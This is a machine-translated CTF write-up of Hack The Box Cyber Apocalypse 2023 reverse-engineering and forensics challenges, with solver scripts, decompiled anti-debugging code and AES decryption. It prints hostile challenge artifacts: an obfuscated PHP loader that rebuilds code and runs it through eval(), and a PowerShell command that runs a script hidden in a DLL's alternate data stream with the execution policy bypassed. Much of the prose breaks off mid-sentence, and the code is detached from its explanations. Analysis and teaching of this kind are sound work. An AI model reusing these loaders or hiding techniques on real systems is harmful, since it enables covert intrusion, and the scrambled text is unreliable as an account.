\n\nThis page has been machine-translated from the original page.
\n
We participated in the Cyber Apocalypse 2023 CTF, held in March 2023.
\nIt was a CTF organized by Hack The Box, and we had a great time — there were many interesting, realistic challenges.
\nWith over 6,400 competing teams, it was one of the largest CTFs we have ever participated in.
\nNew members joined us this time, and we finished in 118th place.
\nWe focused mainly on Rev and Forensic challenges, but a few that felt almost within reach ran out of time on us — very unfortunate.
\nAs usual, here is a summary of the challenges we found interesting or educational.
\n\n\nYou’ve arrived in the Galactic Archive, sure that a critical clue is hidden here. You wait anxiously for a terminal to boot up, hiding in the shadows from the guards hunting for you. Unfortunately, it looks like you’ll need a password to get what you need without setting off the alarms…
\n
The challenge took user input, XOR-ed it with a byte array m1, then XOR-ed the result with m2 to produce the flag.
After analyzing with Ghidra, we found that the byte array obtained by XOR-ing user input with m1 is first compared against another byte array t.
You finally manage to make it into the main computer of the vessel, it’s time to get this over with. You try to shutdown the vessel, however a couple of access codes unknown to you are needed. You try to figure them out, but the computer start speaking some weird language, it seems like gibberish… This challenge took a brute-force approach that ended up costing considerable time. The challenge provided two files: a piece of opaque binary data, and a program that reads and processes that binary data. After analyzing the program, we confirmed that starting from the 3rd byte of the binary data, cutting out 6 bytes at a time yields custom assembly instructions and data fields. Writing a script to extract the instruction portions, we found that the instruction set uses opcodes from 0x0 to 0x18, as shown below. At this point we attempted to analyze the behavior of the custom instruction set directly, but made no progress. Shifting focus to the order in which instructions were called, we noticed that several instructions seemingly responsible for pushing input values onto the stack — From this, we identified the call site of After entering the first password and continuing, the program prompts for a second password. This second password was also compared using Further analysis revealed that Specifically, ‘A’ was replaced with ‘C’, ‘B’ with ’@’, and the 3rd character of the password was mapped to the 10th position at comparison time, and so on. We therefore used the following script to vary the second password’s characters one at a time and build a mapping of character-to-position substitutions: Finally, we built a character-and-position substitution table and used the following script to decode We unpacked it using upx/upx · GitHub and then decompiled it. Skipping ahead to the part that appears to open the target file for encryption: From this, we inferred that some function at address Looking at the address We thought setting a breakpoint at this function call would easily identify which function was being invoked, but a TLS callback implementing anti-debugging was in place, preventing execution under a debugger. A Reference: Detect debugger with TLS callback - Source Codes - rohitab.com - Forums To enable debugging, we patched the conditional branch from JE to JNE. This allowed debugging with WinDbg. Tracing execution in the debugger revealed that the address at This appears to be where the file’s string data is encrypted, but we were unable to identify exactly what it was doing and gave up on this path. From here, we consulted a writeup and continued tracing the behavior. We started by getting an overall picture of the main function. The following shows the first block of the main function, reformatted for clarity. First, we confirmed in the debugger that We also identified that Next is Because all operations are XOR, the net result should be no change, which we verified in the debugger by confirming that Using the DATA section address obtained from The subsequent code uses the previously identified The first argument being the result of Reference: NTAPI Undocumented Functions We now look at the remaining three calls: Starting with Further debugging confirmed that At the point of the After the call, As documented, Reference: NtQueryInformationProcess function (winternl.h) - Win32 apps | Microsoft Learn Passing 0x1f as Reference: NtQueryInformationProcess | Cyber Security Information Bureau This is apparently a commonly used anti-analysis technique in malware. When Indeed, The second argument being 0 only happens when debugging is active, so we changed it to 1 and ran the program; the computed result was This value is stored in We now look at the encryption logic inside The encryption happens at the line The encryption keys are We confirmed in the debugger that The encryption code that is called looks like: After reading through the code with the help of a writeup, we could not fully understand it ourselves, but tracing down the functions it calls reveals an AES S-Box-like byte array, confirming that AES encryption is in use. (Is this supposed to be obvious?) We were unfortunately unable to identify this independently, but with reference to Vessel Cartographer | bi0s we decrypted the file using the following solver: The flag is below. That was a heavy one… We decided to identify when this file was uploaded and read its contents. Extracting the uploaded By removing only the Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly. The challenge asked us to identify what kind of incident occurred when data was exfiltrated using rclone. We were given multiple evtx files and sigma rules, but we chose to use Yamato-Security/hayabusa with its default rules instead of the provided sigma rules. We ran the following command to extract results from the provided event logs: Filtering the results for High-severity events, we found the following command: This command revealed the key, service, and PID used during the rclone execution, giving us the flag. Reference: Detecting Rclone – An Effective Tool for Exfiltration – NCC Group Research Pandora has been using her computer to uncover the secrets of the elusive relic. She has been relentlessly scouring through all the reports of its sightings. However, upon returning from a quick coffee break, her heart races as she notices the Windows Event Viewer tab open on the Security log. This is so strange! Immediately taking control of the situation she pulls out the network cable, takes a snapshot of her machine and shuts it down. She is determined to uncover who could be trying to sabotage her research, and the only way to do that is by diving deep down and following all traces … We were given a virtual hard disk image from a compromised environment. It took a little time to find a foothold, but we decided to analyze the system’s event logs. Using Hayabusa as before, we enumerated the High-severity alerts and found that the following command had been executed: We were aware of NTFS ADS abuse as a concept, but this was our first time seeing it exploited in practice — very interesting. As a side note, the The file As shown above, the script was heavily obfuscated with symbols. Decoding it from left to right, we were eventually able to recover a string expressed as Manually deobfuscating was somewhat tedious, so we wrote the following regex-based solver: Recovering the script this way ultimately let us retrieve the flag. Pandora received an email with a link claiming to have information about the location of the relic and attached ancient city maps, but something seems off about it. Could it be rivals trying to send her off on a distraction? Or worse, could they be trying to hack her systems to get what she knows?Investigate the given attachment and figure out what’s going on and get the flag. The link is to http://relicmaps.htb:/relicmaps.one. The document is still live (relicmaps.htb should resolve to your docker instance). We identified the address and path of the challenge’s C2 server and retrieved the suspicious OneNote file. Running Looking at We then downloaded this file from the C2 server. The file itself was obfuscated as shown below: This script uses It then uses This decryptor is used to decrypt the binary data The binary data is gzip-compressed; after decompression via Finally, This implementation closely resembles AsyncRAT and similar malware families dropped via OneNote. We were able to identify the flag from the final Consulting a writeup afterward, the intended approach was not to directly exploit the .NET assembly loaded into memory by A much cleaner method — good lesson learned. The aliens are gathering their best malware developers to stop Pandora from using the relic to her advantage. They relieved their ancient ransomware techniques hidden for years in ancient tombs of their ancestors. The developed ransomware has now infected Linux servers known to be used by Pandora. The ransom is the relic. If Pandora returns the relic, then her files will be decrypted. Can you help Pandora decrypt her files and save the relic? We were given a pcap and a memory dump captured from an environment infected by ransomware. Exporting objects from the pcap produced the following script: Here, GPG encryption was performed using a pre-defined key together with a randomly generated string. This means that recovering that key would be enough to decrypt the encrypted file. We were not sure of the cleanest approach to extract the key, but we were able to brute-force it from the memory dump and retrieve the flag. Deobfuscating this script revealed that We identified the downloaded filename as The file Decompiling it with ILSpy gave us nearly raw source code. We focused in particular on the following code: Reversing this step by step, we identified that the code decrypts an AES-encrypted payload and executes it. Further analysis revealed that the flag was AES-encrypted, converted to an image, and sent to a C2 service via POST — and we identified the key. Unfortunately, we ran out of time before we could decrypt the flag. We identified the key but did not have the stamina to push it all the way through — a very interesting challenge nonetheless. Reference: HTB: CA2023 — Forensics Interstellar C2 | by Khris Tolbert | Maveris Labs | Mar, 2023 | Medium This CTF had a large number of challenges closely mirroring real-world malware analysis and incident response scenarios, making it a thoroughly enjoyable experience. We have a strong interest in malware analysis and forensics, and plan to keep studying going forward.Alien Saboteaur (Rev)
\n\n
\nvm_input, vm_store, vm_push, and others — were called multiple times before a branch via vm_je was taken.vm_je in gdb and used the following script to flip the ZF flag and extract register values one by one, allowing us to brute-force the first password:for c in range(len(\"c0d3_r3d_5h\")):\n # register\n reg = int(gdb.parse_and_eval(\"$rax\"))\n pw += chr(reg)\n\n gdb.execute(\"set $eflags ^= (1 << $ZF)\")\n gdb.execute(\"continue\")vm_je, so we extracted information the same way via brute force — but what we got was the nonsensical string e]wJ3@Vlu7]5nnf6l6pewj1y]1pln32661.e]wJ3@Vlu7]5nnf6l6pewj1y]1pln32661 is the actual second-password string with both its characters and their positions replaced according to fixed rules.# gdb -x solver2.py\nimport gdb\nfrom pprint import pprint\n\nBINDIR = \"/root\"\nBIN = \"vm\"\n\n\"\"\"\nb *(vm_je+124)\nset $ZF = 6\nc0d3_r3d_5h\nset $eflags ^= (1 << $ZF)\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\"\"\"\n\ngdb.execute('file {}/{}'.format(BINDIR, BIN))\ngdb.execute('b *(vm_je+124)')\ngdb.execute('set $ZF = 6')\n\n# echo \"AAAAAAAAAAAAAAAAA\" > input.txt; echo \"e]wJ3@Vlu7]5nnf6l6pewj1y]1pln32661\" >> input.txt\norder = []\n\n# for i in range(0,len(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\")):\nfor i in range(0,1):\n with open(\"input.txt\", \"w\") as f:\n t = list(\"AAAAAAAAAAAAAAAAA\\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\")\n t = list(\"AAAAAAAAAAAAAAAAA\\n15lgTu_lB1n43w44dh740r_Hu3n_3}{l_ngr\")\n # t[18+i] = \"B\"\n f.write(\"\".join(t))\n\n\n gdb.execute('run bin < ./input.txt')\n\n pw = \"\"\n for c in range(len(\"c0d3_r3d_5h\")):\n # register\n reg = int(gdb.parse_and_eval(\"$rax\"))\n pw += chr(reg)\n\n gdb.execute(\"set $eflags ^= (1 << $ZF)\")\n gdb.execute(\"continue\")\n\n # gdb.execute('b *(vm_run+25)')\n gdb.execute(\"set $eflags ^= (1 << $ZF)\")\n gdb.execute(\"continue\")\n\n alp = []\n for c in range(36):\n # register\n reg = int(gdb.parse_and_eval(\"$rax\"))\n alp.append(chr(reg))\n if int(gdb.parse_and_eval(\"$rcx\")) != reg:\n gdb.execute(\"set $eflags ^= (1 << $ZF)\")\n gdb.execute(\"continue\")\n\n order.append(alp.index(\"@\"))\n print(alp)\n print(order)e]wJ3@Vlu7]5nnf6l6pewj1y]1pln32661, obtaining the flag:alp = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij\"\nalp = \"klmnopqrstuvwxyz1234567890!#$%}{_-^~\"\nflag = \"e]wJ3@Vlu7]5nnf6l6pewj1y]1p\\177ln32661]\"\nresult = ['\\x7f', 'v', 'z', 'i', 's', 'o', 'n', \"'\", 'r', 'm', '3', '0', '5', 'q', 'x', ']', '{', '4', 't', '/', 'y', '1', ';', 'l', '7', '\\\\', 'p', '|', '2', '!', ':', 'u', 'w', '&', '6', '#']\norder = [3, 6, 5, 23, 9, 8, 4, 26, 13, 1, 32, 18, 31, 2, 16, 14, 10, 11, 21, 34, 24, 17, 12, 30, 22, 28, 35, 29, 33, 7, 0, 20, 15, 19, 25, 27]\n\ndict = {'C': 'A', '@': 'B', 'A': 'C', 'F': 'D', 'G': 'E', 'D': 'F', 'E': 'G', 'J': 'H', 'K': 'I', 'H': 'J', 'I': 'K', 'N': 'L', 'O': 'M', 'L': 'N', 'M': 'O', 'R': 'P', 'S': 'Q', 'P': 'R', 'Q': 'S', 'V': 'T', 'W': 'U', 'T': 'V', 'U': 'W', 'Z': 'X', '[': 'Y', 'X': 'Z', 'c': 'a', '`': 'b', 'a': 'c', 'f': 'd', 'g': 'e', 'd': 'f', 'e': 'g', 'j': 'h', 'k': 'i', 'h': 'j', 'i': 'k', 'n': 'l', 'o': 'm', 'l': 'n', 'm': 'o', 'r': 'p', 's': 'q', 'p': 'r', 'q': 's', 'v': 't', 'w': 'u', 't': 'v', 'u': 'w', 'z': 'x', '{': 'y', 'x': 'z', '3': '1', '0': '2', '1': '3', '6': '4', '7': '5', '4': '6', '5': '7', ':': '8', ';': '9', '2': '0', '#': '!', '!': '#', '&': '$', \"'\": '%', '\\x7f': '}', 'y': '{', ']': '_', '/': '-', '\\\\': '^', '|': '~'}\nfor i in range(36):\n dict[result[order[i]]] = alp[i]\nprint(dict)\n\n\nans = [\"0\" for i in range(37)]\nfor i in range(len(flag)):\n ans[i] = dict[flag[order[i]]]\n\nprint(\"\".join(ans))(param_1 + 0x12e0) was encrypting the file contents loaded into _Dst using two 16-byte arrays: &DAT_140005050 and &DAT_140006c58.(param_1 + 0x12e0), the calling code suggests that it is derived from some transformation of DAT_140005060.tls_callback is code that runs before the process entry point is called; anti-debugger logic placed here prevents debugging.void tls_callback_0(void)\n\n{\n BOOL BVar1;\n \n BVar1 = IsDebuggerPresent();\n if (BVar1 != 0) {\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n return;\n}(param_1 + 0x12e0) contains the following code:unknown_data initially holds 64745e29db38.unknown_code1 points to ntdll!NtAllocateVirtualMemory and unknown_code2 points to ntdll!NtWriteVirtualMemory.unknown_data = DAT_00005008 ^ (ulonglong)auStack_58;\nresult_GetCurrentProcess = GetCurrentProcess();\nunknown_code1 = (code *)FUN_00001080(0xd026c5e3);\nunknown_code2 = (code *)FUN_00001080(0x749cf0df);FUN_00001590; from the decompiled output it appears to repeat some operation on DAT_00005070 0x1600 times.DAT_00005070 stays constant across the call.!dh challenge_patched -s, we monitored challenge_patched+5070 and confirmed no change before and after the FUN_00001590 call.NtAllocateVirtualMemory and NtWriteVirtualMemory to allocate 0x1600 bytes and store the value of DAT_00005060:(*ntdll!NtAllocateVirtualMemory)(result_GetCurrentProcess2,&base_address,0,&0x1600);\nlocal_38 = 0;\n(*ntdll!NtWriteVirtualMemory)(result_GetCurrentProcess,base_address,&DAT_00005060,0x1600);GetCurrentProcess is because these functions take a ProcessHandle as their first argument. FUN_00001210(base_address);\n FUN_00001290(base_address);\n FUN_00001720(unknown_data ^ (ulonglong)auStack_58);FUN_00001210, the reformatted decompiled output is as follows:void FUN_00001210(longlong base_address)\n\n{\n code *pcVar1;\n HANDLE pvVar2;\n undefined auStack_48 [32];\n undefined *local_28;\n undefined4 local_18;\n undefined local_14 [4];\n ulonglong local_10;\n \n local_10 = DAT_00005008 ^ (ulonglong)auStack_48;\n pcVar1 = (code *)FUN_00001080(0xbe774f89);\n if (pcVar1 != (code *)0x0) {\n pvVar2 = GetCurrentProcess();\n local_28 = local_14;\n (*pcVar1)(pvVar2,0x1f,&local_18);\n (*(code *)(base_address + 0x12a0))(&DAT_00005050,local_18);\n }\n FUN_00001720(local_10 ^ (ulonglong)auStack_48);\n return;\n}(*pcVar1)(pvVar2,0x1f,&local_18); is ntdll!NtQueryInformationProcess.ntdll!NtQueryInformationProcess call, local_18 holds cd8753fc50.local_18 is passed to the custom function *(code *)(base_address + 0x12a0).ntdll!NtQueryInformationProcess takes a ProcessInformationClass value in its second argument to specify the type of process information to retrieve.ProcessInformationClass is not covered in official documentation, but it appears to retrieve ProcessDebugFlags, which indicates whether a debugger is attached.ProcessDebugFlags is specified, the output ProcessInformation pointed to by the third argument receives 0 when a debugger is present.*(code *)(base_address + 0x12a0) was called with DAT_00005050 and 0 as arguments.6d597133733676397924422645294840.DAT_00005050 and used in the subsequent encryption.FUN_00001290.(*(code *)(param_1 + 0x12e0))(_Dst,nNumberOfBytesToWrite,&DAT_140005050,&DAT_140006c58); noted at the top.DAT_00005050 and DAT_00006c58.DAT_00006c58 is all \\x00.0000025c`b5d312e0 48895c2408 mov qword ptr [rsp+8],rbx ss:000000b5`952ff3d0=00000000000000ff\n0000025c`b5d312e5 57 push rdi\n0000025c`b5d312e6 4881ece0000000 sub rsp,0E0h\n0000025c`b5d312ed 498bc0 mov rax,r8\n0000025c`b5d312f0 488bda mov rbx,rdx\n0000025c`b5d312f3 488bf9 mov rdi,rcx\n0000025c`b5d312f6 488bd0 mov rdx,rax\n0000025c`b5d312f9 4d8bc1 mov r8,r9\n0000025c`b5d312fc 488d4c2420 lea rcx,[rsp+20h]\n0000025c`b5d31301 e8aaf4ffff call 0000025c`b5d307b0\n0000025c`b5d31306 4c8bc3 mov r8,rbx\n0000025c`b5d31309 488d4c2420 lea rcx,[rsp+20h]\n0000025c`b5d3130e 488bd7 mov rdx,rdi\n0000025c`b5d31311 e8aaf0ffff call 0000025c`b5d303c0\n0000025c`b5d31316 488b9c24f0000000 mov rbx,qword ptr [rsp+0F0h]\n0000025c`b5d3131e b001 mov al,1\n0000025c`b5d31320 4881c4e0000000 add rsp,0E0h\n0000025c`b5d31327 5f pop rdi\n0000025c`b5d31328 c3 retfrom Crypto.Cipher import AES\nf1 = open(\"flag.png\",\"wb\")\nx = AES.new(key=b'mYq3s6v9y$B&E)H@', mode=AES.MODE_CBC, iv=b'\\x00'*16)\nf2 = open(\"vessel_map.jpeg.owo\", \"rb\")\nbytes = f2.read()\nf1.write(x.decrypt(bytes))graphicmap.php revealed an obfuscated script embedded inside:<?php \n$pPziZoJiMpcu = 82; \n$liGBOKxsOGMz = array(); \n$iyzQ5h8qf6 = \"\" ; \n$iyzQ5h8qf6 .= \"<nnyo ea\\$px-aloerl0=e r\\$0' weme Su rgsr s\\\"eu>\\\"e'Er= elmi)y ]_'t>bde e e =p xt\\\" ?ltps vdfic-xetrmsx'l0em0 o\\\"oc&'t [r\\\"e _e;eV.ncxm'vToil ,F y\"; \n$iyzQ5h8qf6 .= \"<r s -<a \\\"op r_P< poeeihaeild /ds\\\"se4bsxao1: r]du ;e\\$'o,t dn\\n)i\\$'me'maoate{e I!lb>'u btde .sr ege/ han:t\"; \n$iyzQ5h8qf6 .= \"elrlenjl t>( 0'eCdd0 l et0\\n'seu u it ;e_ dc>ulUd'T\\nxe\\$L<er<.l oh>c ii aert pdt iai(ed.QiJr\\n\\$i0; 0\\\"e0' d= ex ].xp\\$r re \\nwSn'u<lup ]o iluE/=>b\\$t r>\\n\"; \n$iyzQ5h8qf6 .= \"h rxn ltmb \\n'-aodd') bubaa\\nff0 i0] )- [ &\\\"4 ==e[wn (r #iEa tftelF)U sspSb\\\"'rd dO o e_t ppso \\n]DpneaC;aoesvp\\ni( }f0 & ' \\\"( ]0 =sc'o \\$s #nRmaeoi=oi)p te\"; \n$iyzQ5h8qf6 .= \"l[>c;>ia ew agP aw(d i;ep:rto\\nnor/a/<l )\\n( = ?;\\$r\\$0 0 'puwr\\$\\$d\\\" fgVeu'rp'al l s o'<o\\n<rs rn \\\" leeetu\\$y f\\nsl (en dtyjS3?e\\$ ) 0 \\ngem0= xrtrlsdi; l E=t>ma\\\"d\"; \n$iyzQ5h8qf6 .= \"e{o iafbl\\nb. }ee < ptrchid> cia''t s qc.p)m{ \\$ (0' rao0 ) 'ieid;ir\\n adR'o\\\\ r.''\\na ifdiro >'\\$\\ndr<t apmh(di\\\" ( rctE)\"; \n$iyzQ5h8qf6 .= \"e mtlur3h;o m{\\$2x odd0( )n't[\\nr) gi[dcnat\\$ d n Dl>r R k}\\\"<tr twso\\$(r; i iatx;n iriei.p\\nd\\$ o m0' u\\\"e1\\$\\$ \"; \n$iyzQ5h8qf6 .= \" t]e'} ) } r'io\\\"c/_in ' (ie': e&e\\n>/b> hu( df)\\n s ptap\\nt nabrp6\\n et d\\$o0 p] )ogi?f)'r\\n= \\n=ePrm;tfGda\"; \n$iyzQ5h8qf6 .= \" ]e\\\"mrT;r s&ye\\nto\\\" (i\\$\\\"ii e s tici - ipryt/\\n y etd): [ & wrf (;]e\\n { cH'p\\nioE=m [c.oeo\\ne u c hd; \\$dd<rl.c e iohr L fca/ jf &p ye \"; \n$iyzQ5h8qf6 .= \"\\\"= ?no('\\\"\\n,a\\n\\$\\n HtP leorT'e 'h\\$vcU d l'=h >y\\n d(it.e h t onme e idr1-su e &p ?' e 0 eu t% d\\$_ To_vecnm[f= nouetp \\\" t.\"; \n$iyzQ5h8qf6 .= \">o \\n> eifrd'o\\\"o ( n/es n eny.-/n 0=e e& - x(0'rp\\$'1 \\$'dP BrSath=-'i' a p_ol > \\$ \\n cri)>/w< \\$i:on: g \"; \n$iyzQ5h8qf6 .= \"d. 1>bc x'l0= ''\\$e\\$0x[[m s g]iO {yEleo'ddls m\\\"luro E}o_\\$\\\"< < h.l <'n/\\\" _f ct t c-2\\not 2dsx'0w;gcm0''\\\"o:% r,rS W Lu= \\\"aieu\\$e<opya r\\nfG\"; \n$iyzQ5h8qf6 .= \"v<t ? o'e.a.et< G Ft;0 h Co-.<oi 0'eAs0'\\nruo2 eed 1 o T 0\\\"Fe'\\\".trTbu'bal)d r\\n Eabh p /o \\$rd/ E(ie ' :eSm>2stoi0; 0'4 otd):xxe's u\\$=[ \"; \n$iyzQ5h8qf6 .= \" w '=o<\\$a'omp]rdo)' o}cTlre h \\\"'w\\\"hv(>t Tfltf) xS/\\n/csnf0 i0;0: uee ee T% pw ' \\$_.]\\\"f/_']Uil)>Da ] r\\no[u>a p <.n<ra\\$\\\\a [ie-i; 'i b<jrt ( }f0 0 \"; \n$iyzQ5h8qf6 .= \"p\\\" ?'cc&'1 [o\\$d dR ..ffS>.pto;<id{[} \\nm'e\\\"d \\n t\\$e/eldnb 'l sl\\n t-osqirp )\\n( })' []& -uu ;s\\$'r_ii iO\\$\\\"\\$'oE\"; \n$iyzQ5h8qf6 .= \"\\\\\\\"l'a\\nbre\\n' uimc);> fidvrtfui\\\"l deTte .;-ocupar\\$ )\\n - \\\" ''tt0\\n\\\"selGrf rtd'd rRn'o>d red nepfam \\n\\n<o\"; \n$iyzQ5h8qf6 .= \"f>a(d=er;e o_rrn h \\n>tretpim{ \\$ ?' w=0w;eex ,.xdE' _i iamV\\\"/a\\\"D >c_ all nd{? tr <l\\$>').\\n> weaea ef \\nsir .no \"; \n$iyzQ5h8qf6 .= \"m{ ; r 0'\\n'\\\"2 =e[T](\\$=Armru>E;>d;i <tf mso(d'\\n> he(aud\\\\\\\" ' \\\" nxnam ai <tpysmtd\\$ o '\\n i(0 ]]0 \\$sc'[;if _ e.t\\\"R\\n '\\nr boi eeai ] \\n >ai ein../ ; lisme \"; \n$iyzQ5h8qf6 .= \"dl lrt.riPet d\\$ r \\$t\\$0: = 0 opuw'\\nsi'D.t\\\"o;[e\\\">ee rl ' dse, \\n Pcsh)r\\\" ' \\n osf'= ee ia mcne y et ' gem4 == wrtrd}_l.a h f\\n'c;\\\\cc sye ]{isx <\"; \n$iyzQ5h8qf6 .= \" eh_r .;\\$\\\". \\n ate)\\\" rs npsi=.r&p y r\\\"o)' ' ) nieii\\nfe/Y\\\"o/oePh\\nnht t.( .\\nnee\\$ t r de.'\\n_'\\$ \\n dsr;' (i k/rn\\\"jm e &p : o]d - x( en'tr\\$i '}<d>ccHoe<o\"; \n$iyzQ5h8qf6 .= \"o y\\\"\\$ ' gtcc a<m(if / S>v ? '('\\n. 'z 3c.hss0=e e u e?' '\\$\\$ rt]e'fl=;\\n/=\\\"uhP cb ril._ (um bti\\$r=\\\"' E\\\"a > ]\\$) b Pe r.=jt\\\"(x'l0=e' p= ; )gw\\$[f)']ie \\n\\$h\"; \n$iyzQ5h8qf6 .= \"';so_\\\"hr\\\"yfe<F u f\\$td lrsd('/. R.l \\n )f; a r(}e3\\\"st>\\$1csx'l- [ &'\\n ros'(;];l(\\$}d2G\\n> S<o>< =/I p i_ir e>sir\\\"'\\$ V u}\\n )i\\n s a\\$\\nl.h\\\"p<f0'e8l\"; \n$iyzQ5h8qf6 .= \"s' \\\"( r i?or=r\\\"\\n,\\ne\\$d\\ni>Ee\\\\\\\"Ei </=('bL l lGoe \\nire.>v E\\$e\\n\\n l ehgf}=6t>:/i0; 0'e;\\$r\\$0' f ulse% i di\\$r\\\"Tcn\\\\Ln\\\"id fc>E o eEns c osa \\\"a Rv) \\n {e\"; \n$iyzQ5h8qf6 .= \" nemi\\n\\\"/t</sl0 i0; \\noem0 ('pdpa1 \\$f=irds;'h<nFp<ni\\$io<S a T:u l n l\\$.l [a) < \\n) aaal\\nscp//ce }f0 \\$ wao0: s[[rds w r;i \\n>o\"; \n$iyzQ5h8qf6 .= \"i<'uipvdll/[ d '[ l a sap_ u 'l[ / ) md:e?tsssmr))\\n( }t ndd1 \\$''\\\"i'% o(')\\nr=e\\\" nb]tnu>ieob' e .'<t s <saS\\$e}Pu\"; \n$iyzQ5h8qf6 .= \"n d ee )>ys:cai )\\ny e\\\"e0' m een]1 ri') c;\\\"pr. pt\\\"r_rrfed \\$c/) s / tEv)\\nHea i { (rp)\\nl//rxp{{ \\$ p r] )- o:xxt,s ls; =sh\\n<u>\\\"tu\"; \n$iyzQ5h8qf6 .= \" ;.e:>ic umb; = t\\$hRa) P m v \\n \\$(u;\\neb/ict\\n m{ e [ & ' d eef % ds\\n{ coeit\\\\'ytt\\n'xr<lhs pd>\\n \\\" hk(Vl[ _.e > f'b\\n<soapd> \\$ o = \\\"=\"; \n$iyzQ5h8qf6 .= \" ?;\\$e'cc(\\$1 [ei\\n ra cn n p y\\n/ie/eou l'< et >e\\$Eun S ] \\n iCl hhojtn\\n t d\\$ ' e 0 \\nw Suu\\\"os\\$'tf en\\\"hpt<metpi'sdbT c o]b ca\"; \n$iyzQ5h8qf6 .= \"<\\nydRea E\\\" e< hlai teta>.\\n y et u x(0' o&'tt%w\\\"se( ad\\\\ouyde=yef.t'ro'c a)r hbt i[ m L<.c/ eecc mesx\\nb< p y '\\$e\\$0x r ;ee1n,.x\\$( lin tpit'p\"; \n$iyzQ5h8qf6 .= \"= bs>>U<e d)> olh =r'.e F/\\\"hh \\$ a)h' ltt.\\nod e &p ;ocm2' l0\\n'\\\"se =e_\\$ pr<\\\" evhhe'(a(E\\\"pbseD \\\" e> >.P ] 'a<ot f hd.e) >\\\"r\"; \n$iyzQ5h8qf6 .= \"g<oi =e e \\nwuo0 dx ]]\\\"r\\$scPd a(b<t= oi=sis\\$r;lrsci{; \\\" N 'H\\\" ]>/ m i ee'-; \\n ao!tv 'l0=e ntd): [8 = ,[gpuOi t\\$riy'cdd'useur\\no>fhr\\n\\n \\$ta \\$/P<.e <t\\\"\"; \n$iyzQ5h8qf6 .= \"l l ar\\\"C\\n <hpo-s psx'l eee \\\"0 == 'rrtSr hd>npsl=dfbsnpo a<uoe vam v'_/ l./d<> e d('o !r.g-tc\\$'e6-s r\\\" ?' e0 ' \\$woieT (i<peua'eime\"; \n$iyzQ5h8qf6 .= \"alr dbl c fabe<a.Sa\\\"s t>/ e')n -eml rlm; 0'e []& - x x(trun'[= \\$rfu=bsPnlitmo. 'rl't oll</l\\$E><e\\\"d<t = rC;t -fieLaao i0; \\\" ''\\$e) \"; \n$iyzQ5h8qf6 .= \"'\\$yipt]'= d)ot'msO'et(ea ]>y<o rue/tuvL</ ?>tr (o\\nr =naapsd}f0 i w=0w;wc )wpt[f)d i;r ti=S ''\\$(dF [< br ee-treaF/t{d<d> \\$h\"; \n$iyzQ5h8qf6 .= \"'n o L\\\".ptcse\\n( }f r 0'\\nou\\$ oee'(;iN r\\nmtet'Tn _\\$Di 'biry a hh>)l'td\\not>\\\" _eCt l rahcied= )\\n( i(0 rtoi?r)'r\\\"\\nrU e.e yx'n'anvP_il t>n>. c\"; \n$iyzQ5h8qf6 .= \"\\\\o>\\n u]d> wd ; Gaoe : ettsssn\\\"= \\$ \\$t\\$4: lewf l;]e% 'L c'capt a maaOFre mF <' hnv\\n {e >< n>\\\"\\n Ednn aets.t.c m{ \\$oem0 d\\\"n('d\\n,a1 ]L h/hce'vveemlS\"; \n$iyzQ5h8qf6 .= \"Ie }pi'b<ee <e \\n).<t l\\\" } Tett m dsp\\\"c cof o mw\\\"o)' []e s[ ds ) o'ot= abn=euTLca\\n_l.r/cx(br ) td o..\\n [re- u ft:>oconi d\\$ on]d - \"; \n$iyzQ5h8qf6 .= \"\\\" r\\$'' \\$'% )oe . i'nlac'=e[Etl ne\\$>bhe\\$r )\\\"d> a e '(nD s i /\\nmomtl et de e?' w=[m e o]1 rc\\$\\$\\\"ohaurtd'='Sor a d<>occ>t < ?> dppc d\"; \n$iyzQ5h8qf6 .= \"'ti t lc/\\n/m/ae y er= ; r \\\"o:x w,s { hfv<nime-yif's[re m'ib< (m\\\"a / {d\\\"\\\" =orh oC-s -heom<apbip &p [ &'\\n i(ed e n % \\n!oiah=de=fpriUu'ya e.r b\\\"'d;b t\"; \n$iyzQ5h8qf6 .= \" \\ni. \\\"sio woTp re(ma!jionee e &\\\"( r \\$t\\$xe'c e\\$1 i ll2'd='oe'lpbf)d '\\$.sr<cr\\nl h r . .in \"; \nfor($i = 0; $i < $pPziZoJiMpcu; $i++) $liGBOKxsOGMz[] = \"\"; \nfor($i = 0; $i < (strlen($iyzQ5h8qf6) / $pPziZoJiMpcu); $i++) { for($r = 0; $r < $pPziZoJiMpcu; $r++) $liGBOKxsOGMz[$r] .= $iyzQ5h8qf6[$r + $i * $pPziZoJiMpcu]; } \n$bhrTeZXazQ = trim(implode(\"\", $liGBOKxsOGMz)); \n$bhrTeZXazQ = \"?>$bhrTeZXazQ\"; \neval( $bhrTeZXazQ ); \n?>eval call and executing the rest, we deobfuscated the script and retrieved the flag.Packet Cyclone (Forensic)
\n\n
\nhayabusa-2.2.0-win-x64.exe csv-timeline -d \"C:\\Users\\Tadpole01\\Downloads\\forensics_packet_cyclone\\Logs\" -o result.csvArtifacts of Dangerous Sightings (Forensic)
\n\n
\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ep bypass - < E:\\C\\Windows\\Tasks\\ActiveSyncProvider.dll:hidden.ps1ActiveSyncProvider.dll:hidden.ps1 retrieves data that was maliciously embedded in an Alternate Data Stream (ADS) of ActiveSyncProvider.dll.dir /r command can be used to enumerate ADS of a target file:dir /r ActiveSyncProvider.dllActiveSyncProvider.dll was still present on the virtual hard disk, so we actually examined the script executed by ActiveSyncProvider.dll:hidden.ps1.[Char]10-style character codes:import re\n\nwith open(\"obs.ps1\", \"r\") as f:\n data = f.read()\n\nwith open(\"result\", \"w\") as f:\n r = re.findall('(\\[Char\\][0-9]+)\\s', data)\n for d in r:\n c = chr(int(d.replace(\"[Char]\", \"\")))\n data = data.replace(d+\" \", c)\n \n f.write(data)Relic Maps (Forensic)
\n\n
